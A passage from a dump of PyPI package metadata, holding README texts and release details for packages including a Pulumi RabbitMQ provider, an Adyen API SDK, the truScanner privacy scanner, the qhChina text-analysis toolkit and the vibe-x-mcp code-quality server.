"matplotlib<4.0.0,>=3.10.0",
"psutil<8.0.0,>=7.0.0",
"vedro<2.0.0,>=1.13.0"
] | [] | [] | [] | [
"Homepage, https://github.com/Lolimpo/vedro-profiling",
"Repository, https://github.com/Lolimpo/vedro-profiling"
] | uv/0.10.4 {"installer":{"name":"uv","version":"0.10.4","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"Ubuntu","version":"24.04","id":"noble","libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":true} | 2026-02-20T06:38:47.614622 | vedro_profiling-0.2.0-py3-none-any.whl | 16,597 | 96/3c/5602c19add5081158cbe2fc868f420d89f13fb4849ea7dacc496b1137369/vedro_profiling-0.2.0-py3-none-any.whl | py3 | bdist_wheel | null | false | 0e6cb9c7f8c15c94b35998d0b1ccd8cc | bbf00c716e9796c2fd982711bb9f922c58207bb4ccc4a7581ddba59312d16bd3 | 963c5602c19add5081158cbe2fc868f420d89f13fb4849ea7dacc496b1137369 | null | [
"LICENSE.txt"
] | 221 |
2.4 | pulumi-rabbitmq | 3.5.0a1771569109 | A Pulumi package for creating and managing RabbitMQ resources. | [](https://github.com/pulumi/pulumi-rabbitmq/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/rabbitmq)
[](https://pypi.org/project/pulumi-rabbitmq)
[](https://badge.fury.io/nu/pulumi.rabbitmq)
[](https://pkg.go.dev/github.com/pulumi/pulumi-rabbitmq/sdk/v3/go)
[](https://github.com/pulumi/pulumi-rabbitmq/blob/master/LICENSE)
# RabbitMQ Resource Provider
The RabbitMQ resource provider for Pulumi lets you manage RabbitMQ resources in your cloud programs. To use
this package, please [install the Pulumi CLI first](https://pulumi.io/).
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (Java/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/rabbitmq
or `yarn`:
$ yarn add @pulumi/rabbitmq
### Python
To use from Python, install using `pip`:
$ pip install pulumi_rabbitmq
### Go
To use from Go, use `go get` to grab the latest version of the library
$ go get github.com/pulumi/pulumi-rabbitmq/sdk/v2
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Rabbitmq
## Configuration
The following configuration points are available:
* `rabbitmq:endpoint` - (Required) The HTTP URL of the management plugin on the RabbitMQ server. The RabbitMQ management
plugin must be enabled in order to use this provder. Note: This is not the IP address or hostname of the RabbitMQ server
that you would use to access RabbitMQ directly. May be set via the `RABBITMQ_ENDPOINT` environment variable.
* `rabbitmq:username` - (Required) Username to use to authenticate with the server. May be set via the `RABBITMQ_USERNAME`
environment variable.
* `rabbitmq:password` - (Optional) Password for the given user. May be set via the `RABBITMQ_PASSWORD` environment variable.
* `rabbitmq:insecure` - (Optional) Trust self-signed certificates. May be set via the `RABBITMQ_INSECURE` environment variable.
* `rabbitmq:cacertFile` - (Optional) The path to a custom CA / intermediate certificate. May be set via the `RABBITMQ_CACERT`
environment variable.
## Reference
For further information, please visit [the RabbitMQ provider docs](https://www.pulumi.com/docs/intro/cloud-providers/rabbitmq) or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/rabbitmq).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, rabbitmq | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-rabbitmq"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:38:13.952181 | pulumi_rabbitmq-3.5.0a1771569109.tar.gz | 33,201 | ba/7a/e12e8942abcc6c1f9895f1f015bbd0b65344fdc0633cfcbbefc9eb6dfdd8/pulumi_rabbitmq-3.5.0a1771569109.tar.gz | source | sdist | null | false | 9121986447320841f0be5719a21f9533 | cd2d421fdbd2330893129c0a3b7fb64ad319c64ad3343e45bc414bd3331de2af | ba7ae12e8942abcc6c1f9895f1f015bbd0b65344fdc0633cfcbbefc9eb6dfdd8 | null | [] | 201 |
2.4 | adyen-apimatic-sdk | 1.0.1 | SDKs for Adyen APIs |
# Getting Started with Adyen APIs
## Introduction
Adyen Checkout API provides a simple and flexible way to initiate and authorise online payments. You can use the same integration for payments made with cards (including 3D Secure), mobile wallets, and local payment methods (for example, iDEAL and Sofort).
This API reference provides information on available endpoints and how to interact with them. To learn more about the API, visit [online payments documentation](https://docs.adyen.com/online-payments).
### Authentication
Each request to Checkout API must be signed with an API key. For this, [get your API key](https://docs.adyen.com/development-resources/api-credentials#generate-api-key) from your Customer Area, and set this key to the `X-API-Key` header value, for example:
```
curl
-H "Content-Type: application/json" \
-H "X-API-Key: YOUR_API_KEY" \
...
```
### Versioning
Checkout API supports [versioning](https://docs.adyen.com/development-resources/versioning) using a version suffix in the endpoint URL. This suffix has the following format: "vXX", where XX is the version number.
For example:
```
https://checkout-test.adyen.com/v71/payments
```
### Server-side API libraries
We provide open-source [server-side API libraries](https://docs.adyen.com/development-resources/libraries/) in several languages:
- PHP
- Java
- Node.js
- .NET
- Go
- Python
- Ruby
- Apex (beta)
See our [integration examples](https://github.com/adyen-examples#%EF%B8%8F-official-integration-examples) for example uses of the libraries.
### Developer resources
Checkout API is available through a Postman collection. Click the button below to create a fork, then set the environment variables at **Environments** > **Adyen APIs**.
[](https://god.gw.postman.com/run-collection/25716737-46ad970e-dc9e-4246-bac2-769c6083e7b5?action=collection%2Ffork&source=rip_markdown&collection-url=entityId%3D25716737-46ad970e-dc9e-4246-bac2-769c6083e7b5%26entityType%3Dcollection%26workspaceId%3Da8d63f9f-cfc7-4810-90c5-9e0c60030d3e#?env%5BAdyen%20APIs%5D=W3sia2V5IjoiWC1BUEktS2V5IiwidmFsdWUiOiIiLCJlbmFibGVkIjp0cnVlLCJ0eXBlIjoic2VjcmV0In0seyJrZXkiOiJZT1VSX01FUkNIQU5UX0FDQ09VTlQiLCJ2YWx1ZSI6IiIsImVuYWJsZWQiOnRydWUsInR5cGUiOiJkZWZhdWx0In0seyJrZXkiOiJZT1VSX0NPTVBBTllfQUNDT1VOVCIsInZhbHVlIjoiIiwiZW5hYmxlZCI6dHJ1ZSwidHlwZSI6ImRlZmF1bHQifSx7ImtleSI6IllPVVJfQkFMQU5DRV9QTEFURk9STSIsInZhbHVlIjoiIiwiZW5hYmxlZCI6dHJ1ZSwidHlwZSI6ImRlZmF1bHQifV0=)
### Going live
To access the live endpoints, you need an API key from your live Customer Area.
The live endpoint URLs contain a prefix which is unique to your company account, for example:
```
https://{PREFIX}-checkout-live.adyenpayments.com/checkout/v71/payments
```
Get your `{PREFIX}` from your live Customer Area under **Developers** > **API URLs** > **Prefix**.
When preparing to do live transactions with Checkout API, follow the [go-live checklist](https://docs.adyen.com/online-payments/go-live-checklist) to make sure you've got all the required configuration in place.
### Release notes
Have a look at the [release notes](https://docs.adyen.com/online-payments/release-notes?integration_type=api&version=71) to find out what changed in this version!, Configure and manage your Adyen company and merchant accounts, stores, and payment terminals.
### Authentication
Each request to the Management API must be signed with an API key. [Generate your API key](https://docs.adyen.com/development-resources/api-credentials#generate-api-key) in the Customer Area and then set this key to the `X-API-Key` header value.
To access the live endpoints, you need to generate a new API key in your live Customer Area.
### Versioning
Management API handles versioning as part of the endpoint URL. For example, to send a request to this version of the `/companies/{companyId}/webhooks` endpoint, use:
```text
https://management-test.adyen.com/v3/companies/{companyId}/webhooks
```
### Going live
To access the live endpoints, you need an API key from your live Customer Area. Use this API key to make requests to:
```text
https://management-live.adyen.com/v3
```
### Release notes
Have a look at the [release notes](https://docs.adyen.com/release-notes/management-api) to find out what changed in this version!
## Install the Package
The package is compatible with Python versions `3.7+`.
Install the package from PyPi using the following pip command:
```bash
pip install adyen-apimatic-sdk==1.0.1
```
You can also view the package at:
https://pypi.python.org/pypi/adyen-apimatic-sdk/1.0.1
## Initialize the API Client
**_Note:_** Documentation for the client can be found [here.](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/client.md)
The following parameters are configurable for the API Client:
| Parameter | Type | Description |
| --- | --- | --- |
| environment | [`Environment`](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/README.md#environments) | The API environment. <br> **Default: `Environment.PRODUCTION`** |
| http_client_instance | `Union[Session, HttpClientProvider]` | The Http Client passed from the sdk user for making requests |
| override_http_client_configuration | `bool` | The value which determines to override properties of the passed Http Client from the sdk user |
| http_call_back | `HttpCallBack` | The callback value that is invoked before and after an HTTP call is made to an endpoint |
| timeout | `float` | The value to use for connection timeout. <br> **Default: 30** |
| max_retries | `int` | The number of times to retry an endpoint call if it fails. <br> **Default: 0** |
| backoff_factor | `float` | A backoff factor to apply between attempts after the second try. <br> **Default: 2** |
| retry_statuses | `Array of int` | The http statuses on which retry is to be done. <br> **Default: [408, 413, 429, 500, 502, 503, 504, 521, 522, 524]** |
| retry_methods | `Array of string` | The http methods on which retry is to be done. <br> **Default: ["GET", "PUT"]** |
| proxy_settings | [`ProxySettings`](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/proxy-settings.md) | Optional proxy configuration to route HTTP requests through a proxy server. |
| logging_configuration | [`LoggingConfiguration`](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/logging-configuration.md) | The SDK logging configuration for API calls |
| api_key_auth_credentials | [`ApiKeyAuthCredentials`](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/auth/custom-header-signature.md) | The credential object for Custom Header Signature |
| basic_auth_credentials | [`BasicAuthCredentials`](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/auth/basic-authentication.md) | The credential object for Basic Authentication |
The API client can be initialized as follows:
### Code-Based Client Initialization
```python
import logging
from adyenapis.adyenapis_client import AdyenapisClient
from adyenapis.configuration import Environment
from adyenapis.http.auth.api_key_auth import ApiKeyAuthCredentials
from adyenapis.http.auth.basic_auth import BasicAuthCredentials
from adyenapis.logging.configuration.api_logging_configuration import LoggingConfiguration
from adyenapis.logging.configuration.api_logging_configuration import RequestLoggingConfiguration
from adyenapis.logging.configuration.api_logging_configuration import ResponseLoggingConfiguration
client = AdyenapisClient(
api_key_auth_credentials=ApiKeyAuthCredentials(
x_api_key='X-API-Key'
),
basic_auth_credentials=BasicAuthCredentials(
username='Username',
password='Password'
),
environment=Environment.PRODUCTION,
logging_configuration=LoggingConfiguration(
log_level=logging.INFO,
request_logging_config=RequestLoggingConfiguration(
log_body=True
),
response_logging_config=ResponseLoggingConfiguration(
log_headers=True
)
)
)
```
### Environment-Based Client Initialization
```python
from adyenapis.adyenapis_client import AdyenapisClient
# Specify the path to your .env file if it’s located outside the project’s root directory.
client = AdyenapisClient.from_environment(dotenv_path='/path/to/.env')
```
See the [Environment-Based Client Initialization](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/environment-based-client-initialization.md) section for details.
## Environments
The SDK can be configured to use a different environment for making API calls. Available environments are:
### Fields
| Name | Description |
| --- | --- |
| PRODUCTION | **Default** |
## Authorization
This API uses the following authentication schemes.
* [`ApiKeyAuth (Custom Header Signature)`](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/auth/custom-header-signature.md)
* [`BasicAuth (Basic Authentication)`](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/auth/basic-authentication.md)
## List of APIs
* [Paymentlinks](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/paymentlinks.md)
* [Account-Companylevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/account-companylevel.md)
* [Account-Merchantlevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/account-merchantlevel.md)
* [Account-Storelevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/account-storelevel.md)
* [Payoutsettings-Merchantlevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/payoutsettings-merchantlevel.md)
* [Users-Companylevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/users-companylevel.md)
* [Users-Merchantlevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/users-merchantlevel.md)
* [My AP Icredential](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/my-ap-icredential.md)
* [AP Icredentials-Companylevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/ap-icredentials-companylevel.md)
* [AP Icredentials-Merchantlevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/ap-icredentials-merchantlevel.md)
* [AP Ikey-Companylevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/ap-ikey-companylevel.md)
* [AP Ikey-Merchantlevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/ap-ikey-merchantlevel.md)
* [Clientkey-Companylevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/clientkey-companylevel.md)
* [Clientkey-Merchantlevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/clientkey-merchantlevel.md)
* [Allowedorigins-Companylevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/allowedorigins-companylevel.md)
* [Allowedorigins-Merchantlevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/allowedorigins-merchantlevel.md)
* [Webhooks-Companylevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/webhooks-companylevel.md)
* [Webhooks-Merchantlevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/webhooks-merchantlevel.md)
* [Paymentmethods-Merchantlevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/paymentmethods-merchantlevel.md)
* [Terminals-Terminallevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/terminals-terminallevel.md)
* [Terminalactions-Companylevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/terminalactions-companylevel.md)
* [Terminalactions-Terminallevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/terminalactions-terminallevel.md)
* [Terminalorders-Companylevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/terminalorders-companylevel.md)
* [Terminalorders-Merchantlevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/terminalorders-merchantlevel.md)
* [Terminalsettings-Companylevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/terminalsettings-companylevel.md)
* [Terminalsettings-Merchantlevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/terminalsettings-merchantlevel.md)
* [Terminalsettings-Storelevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/terminalsettings-storelevel.md)
* [Terminalsettings-Terminallevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/terminalsettings-terminallevel.md)
* [Androidfiles-Companylevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/androidfiles-companylevel.md)
* [Splitconfiguration-Merchantlevel](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/splitconfiguration-merchantlevel.md)
* [Payments](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/payments.md)
* [Donations](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/donations.md)
* [Modifications](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/modifications.md)
* [Recurring](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/recurring.md)
* [Orders](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/orders.md)
* [Utility](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/controllers/utility.md)
## SDK Infrastructure
### Configuration
* [ProxySettings](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/proxy-settings.md)
* [Environment-Based Client Initialization](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/environment-based-client-initialization.md)
* [AbstractLogger](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/abstract-logger.md)
* [LoggingConfiguration](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/logging-configuration.md)
* [RequestLoggingConfiguration](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/request-logging-configuration.md)
* [ResponseLoggingConfiguration](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/response-logging-configuration.md)
### HTTP
* [HttpResponse](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/http-response.md)
* [HttpRequest](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/http-request.md)
### Utilities
* [ApiResponse](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/api-response.md)
* [ApiHelper](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/api-helper.md)
* [HttpDateTime](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/http-date-time.md)
* [RFC3339DateTime](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/rfc3339-date-time.md)
* [UnixDateTime](https://www.github.com/sdks-io/adyen-apimatic-python-sdk/tree/1.0.1/doc/unix-date-time.md)
| text/markdown | null | Muhammad Rafay <muhammad.rafay@apimatic.io> | null | null | null | null | [] | [] | null | null | >=3.7 | [] | [] | [] | [
"apimatic-core>=0.2.24,~=0.2.0",
"apimatic-core-interfaces>=0.1.8,~=0.1.0",
"apimatic-requests-client-adapter>=0.1.10,~=0.1.0",
"python-dotenv<2.0,>=0.21",
"deprecation~=2.1",
"pytest>=7.2.2; extra == \"testutils\""
] | [] | [] | [] | [
"Documentation, https://docs.adyen.com/api-explorer/"
] | twine/6.2.0 CPython/3.9.13 | 2026-02-20T06:38:07.747611 | adyen_apimatic_sdk-1.0.1.tar.gz | 596,344 | 57/ce/ff8c686da26f97089e5bfdf366b89adc902c433839281fe025bd30495ce1/adyen_apimatic_sdk-1.0.1.tar.gz | source | sdist | null | false | 7e8693a53981d02671c7c6526a153335 | eff9729ac9616abea2a5a746a29e48d5df2fd2260ee78ed73216681fb6d60e31 | 57ceff8c686da26f97089e5bfdf366b89adc902c433839281fe025bd30495ce1 | null | [
"LICENSE"
] | 218 |
2.4 | truscanner | 0.2.7 | Open-Source Static Analysis for Privacy Data Flows | # truScanner from truConsent


**Open-Source Static Analysis for Privacy Data Flows**
`truScanner` is a static code analysis tool designed to discover and analyze personal data elements in your source code. It helps developers and security teams identify privacy-related data flows and generate comprehensive reports.
[📦 PyPI Project](https://pypi.org/project/truscanner/) • [🌐 App Dashboard](https://app.truconsent.io/)
## 🚀 Features
- **Comprehensive Detection**: Identifies 300+ personal data elements (PII, financial data, device identifiers, etc.)
- **Full Catalog Coverage**: Loads and scans against all configured data elements from `data_elements/` (not a truncated subset)
- **Interactive Menu**: Arrow-key navigable menu for selecting output formats
- **Real-time Progress**: Visual progress indicator during scanning
- **Multiple Report Formats**: Generate reports in TXT, Markdown, or JSON format
- **AI-Powered Enhancement**: Optional integration with Ollama or OpenAI for deeper context
- **Backend Integration**: Optional upload to backend API for centralized storage
- **Auto-incrementing Reports**: Automatically manages report file naming to prevent overwrites
## truScanner CLI

## 📦 Installation
### Prerequisites
- Python 3.9 or higher
- [ollama](https://ollama.com/) (optional, for local AI scanning)
### Quick Install
Using pip:
```bash
pip install truscanner
```
Using uv:
```bash
uv pip install truscanner
```
### Verify installation:
```bash
truscanner --help
```
## 🛠️ Usage
### Basic Usage
Scan a directory with the interactive menu:
```bash
truscanner scan <directory_path>
```
### Example
```bash
truscanner scan ./src
truscanner scan ./my-project
truscanner scan C:\Users\username\projects\my-app
```
### Python API Usage
Use truScanner directly from Python:
```python
import truscanner
# Local path
check = truscanner("/path/to/project")
# file:// URL also works
check = truscanner("file:///Users/username/project")
# Optional explicit call style
check = truscanner.scan("/path/to/project", with_ai=False)
# API metadata: total configured catalog size
print(check["configured_data_elements"])
```
Minimal script style:
```python
import truscanner
scan = truscanner("folder_path")
```
Runnable root example:
```bash
python3 simple_truscanner_usage.py ./src
```
Quick smoke check script:
```bash
uv run python scripts/check_truscanner_api.py ./src
```
Installed-package verification (CLI + Python API):
```bash
python3 verify_truscanner_install.py
```
### Interactive Workflow
1. **Select Output Format**:
- Use arrow keys (↑↓) to navigate
- Press Enter to select
- Options: `txt`, `md`, `json`, or `All` (generates all three formats)
2. **Scanning Progress**:
- Real-time progress bar shows file count and percentage
- Prints configured definition count at start (example: `Loaded data element definitions: 380`)
- Example: `Scanning: 50/200 (25%) [████████░░░░░░░░░░░░] filename.js`
3. **AI Enhanced Scan (Optional)**:
- After the initial scan, you'll be prompted:
`Do you want to use Ollama/AI for enhanced PII detection (find what regex missed)? (Y, N):`
- This uses local LLMs (via Ollama) or OpenAI to find complex PII.
- Live scanning timer: `AI Scanning: filename.js... (5.2s taken)`
4. **Report Generation**:
- Reports are saved in `reports/{directory_name}/` folder
- Files are named: `truscan_report.txt`, `truscan_report.md`, `truscan_report.json`
- Subsequent scans auto-increment: `truscan_report1.txt`, `truscan_report2.txt`, etc.
- AI findings are saved with `_llm` suffix.
5. **Backend Upload (Optional)**:
- After reports are saved, you'll be prompted: `Do you want to upload the scan report for the above purpose? (Y, N):`
- Enter `Y` to upload scan results to backend API
- View your uploaded scans and analytics at [app.truconsent.io](https://app.truconsent.io/)
### Command Options
```bash
truscanner scan <directory> [OPTIONS]
Options:
--with-ai Enable AI/LLM scanner directly
--ai-mode AI scan mode: fast, balanced, or full (default: balanced)
--personal-only Only report personal identifiable information (PII)
--help Show help message
```
### AI Speed vs Coverage Modes
Use `--ai-mode` to control AI scan behavior:
- `fast`: Small prompts, fastest runtime, may skip very large low-signal files
- `balanced` (default): Good speed while keeping broad file coverage
- `full`: Largest context and highest coverage, slowest runtime
Examples:
```bash
truscanner scan ./src --ai-mode fast
truscanner scan ./src --ai-mode balanced
truscanner scan ./src --ai-mode full
```
## 📊 Report Output
### Report Location
Reports are saved in: `reports/{sanitized_directory_name}/`
### Report Formats
- **TXT Report** (`truscan_report.txt`): Plain text format, easy to read
- **Markdown Report** (`truscan_report.md`): Formatted markdown with headers and code blocks
- **JSON Report** (`truscan_report.json`): Structured JSON data for programmatic access
### Report Contents
Each report includes:
- **Scan Report ID**: Unique 32-bit hash identifier
- **Summary**: Configured data elements, distinct detected elements, total findings, and time taken
- **Findings by File**: Detailed list of data elements found in each file
- **Summary by Category**: Aggregated statistics by data category
JSON reports also include:
- `configured_data_elements`
- `distinct_detected_elements`
### Report ID
Each scan generates a unique **Scan Report ID** (32-bit MD5 hash) that:
- Appears in the terminal after scanning
- Is included at the top of all generated report files
- Can be used to track and reference specific scans
## 🔧 Configuration
The `truscanner` package is pre-configured with the live backend URL for seamless scan uploads. No additional configuration is required.
## 📁 Project Structure
```
truscanner/
├── src/
│ ├── main.py # CLI entry point
│ ├── regex_scanner.py # Core scanning engine
│ ├── ai_scanner.py # AI/LLM scanning engine
│ ├── report_utils.py # Report utilities
│ └── utils.py # Utilities
├── data_elements/ # Data element definitions
├── reports/ # Generated reports
├── pyproject.toml # Project configuration
└── README.md
```
## 📝 Change Policy
For this repository, every code or behavior change must include a matching README update in the same change.
This includes:
- CLI flags, prompts, defaults, scan behavior, output format changes
- Python API changes (`import truscanner`, return schema, parameters)
- Dependency/runtime requirements
- Report format/location updates
## 🤝 Support
For issues, questions, or contributions, please contact: hello@truconsent.io
MIT License - see LICENSE file for details
| text/markdown | null | truconsent <hello@truconsent.io> | null | null | MIT | null | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"click>=8.1.8",
"inquirer>=3.1.0",
"ollama>=0.1.0",
"openai>=1.0.0",
"python-dotenv>=1.0.0",
"requests>=2.31.0",
"build; extra == \"dev\"",
"hatchling; extra == \"dev\"",
"pytest>=8.0.0; extra == \"dev\"",
"twine; extra == \"dev\""
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.9.6 | 2026-02-20T06:37:44.959932 | truscanner-0.2.7.tar.gz | 39,272 | e8/af/20ec44acc712b1eddefb2c3f03338b93282110b7c103b5d4fa544d7d5f1b/truscanner-0.2.7.tar.gz | source | sdist | null | false | 285d9ba139f3dd8b695a6d1a76e2be4b | c5b759b014185effd2ba0fe6723726da5037592f47066ec06d99bce037ffe64b | e8af20ec44acc712b1eddefb2c3f03338b93282110b7c103b5d4fa544d7d5f1b | null | [
"LICENSE"
] | 212 |
2.4 | qhchina | 0.1.13 | A Python package for NLP tasks related to Chinese text. | # qhChina
A Python toolkit for computational analysis of Chinese texts in humanities research.
## Features
- **Preprocessing**: Chinese text segmentation with multiple backends (spaCy, Jieba, BERT, LLM)
- **Word Embeddings**: Word2Vec training and temporal semantic change analysis (TempRefWord2Vec)
- **Topic Modeling**: LDA with Gibbs sampling and Cython acceleration
- **Stylometry**: Authorship attribution and document clustering
- **Collocations**: Statistical collocation analysis and co-occurrence matrices
- **Corpus Comparison**: Identify significant vocabulary differences between corpora
- **Helpers**: CJK font management, text loading, stopwords
## Installation
```bash
pip install qhchina
```
## Building from Source
```bash
git clone https://github.com/mcjkurz/qhchina.git
cd qhchina
pip install -e .
```
This will compile the Cython extensions and install the package in editable mode.
## Documentation
Full documentation and examples: [www.qhchina.org/docs/](https://www.qhchina.org/docs/)
## Tests
```bash
pip install pytest
pytest tests/
```
## License
MIT License
| text/markdown | null | Maciej Kurzynski <makurz@gmail.com> | null | null | MIT | digital humanities, nlp, Chinese, text analysis, corpus linguistics, topic modeling, stylometry | [
"Development Status :: 4 - Beta",
"Intended Audience :: Science/Research",
"Intended Audience :: Developers",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Programming Language :: Cython",
"Topic :: Text Processing :: Linguistic",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"Natural Language :: Chinese (Simplified)",
"Natural Language :: Chinese (Traditional)"
] | [] | null | null | >=3.11 | [] | [] | [] | [
"numpy>=2.0.2",
"scipy>=1.14.1",
"matplotlib>=3.10.0",
"scikit-learn>=1.6.1",
"tqdm>=4.66.0",
"pandas>=2.1.0"
] | [] | [] | [] | [
"Homepage, https://www.qhchina.org/docs",
"Documentation, https://www.qhchina.org/docs",
"Repository, https://github.com/mcjkurz/qhchina",
"Bug Tracker, https://github.com/mcjkurz/qhchina/issues"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T06:36:42.204034 | qhchina-0.1.13.tar.gz | 31,397,875 | d8/25/75f3a4e46d539775b17c877532d8c1c3dfc594d3c8800a00383d7e9c9bff/qhchina-0.1.13.tar.gz | source | sdist | null | false | fdd41b1f3925fcc390bf36c1c8b37254 | 46676eab966b03fe88b71d0b2be4074b071bdabdcf0927a0f71e7b53cd4693c5 | d82575f3a4e46d539775b17c877532d8c1c3dfc594d3c8800a00383d7e9c9bff | null | [
"LICENSE"
] | 1,200 |
2.4 | vibe-x-mcp | 1.0.0 | VIBE-X AI Code Quality & Team Collaboration MCP Server | # vibe-x-mcp
VIBE-X AI Code Quality & Team Collaboration MCP Server for Cursor / Claude.
## Features
- **6-Gate Pipeline**: Syntax, Rules, Integration, Security, Architecture, Collision
- **RAG Code Search**: Semantic search over your codebase via ChromaDB
- **Hidden Intent (.meta.json)**: Auto-extract code intent with AST analysis
- **Team Collaboration**: Work Zone conflict prevention, Decision Extractor
- **Alert & Feedback**: Failure pattern analysis, threshold-based alerts
- **Onboarding Q&A**: RAG-based project Q&A for new team members
## 19 MCP Tools
| Category | Tools |
|----------|-------|
| Quality | `gate_check`, `pipeline`, `security_review`, `architecture_check` |
| RAG | `code_search`, `index_codebase` |
| Collab | `work_zone`, `extract_decisions` |
| Meta | `meta_analyze`, `meta_batch`, `meta_coverage`, `meta_dependency_graph` |
| Analysis | `feedback_analysis`, `integration_test` |
| Ops | `project_status`, `onboarding_qa`, `get_alerts`, `acknowledge_alerts`, `health_breakdown` |
## Install
```bash
pip install vibe-x-mcp
```
## Usage
### Cursor IDE
Add to `~/.cursor/mcp.json`:
```json
{
"mcpServers": {
"vibe-x": {
"command": "vibe-x-mcp",
"args": ["--project-root", "/path/to/your/project"],
"env": {
"PYTHONIOENCODING": "utf-8"
}
}
}
}
```
### CLI
```bash
vibe-x-mcp --project-root /path/to/your/project
vibe-x-mcp --project-root . --transport sse
```
### uvx (no install)
```bash
uvx vibe-x-mcp --project-root /path/to/your/project
```
## Requirements
- Python >= 3.10
- Project with source code to analyze
## License
MIT
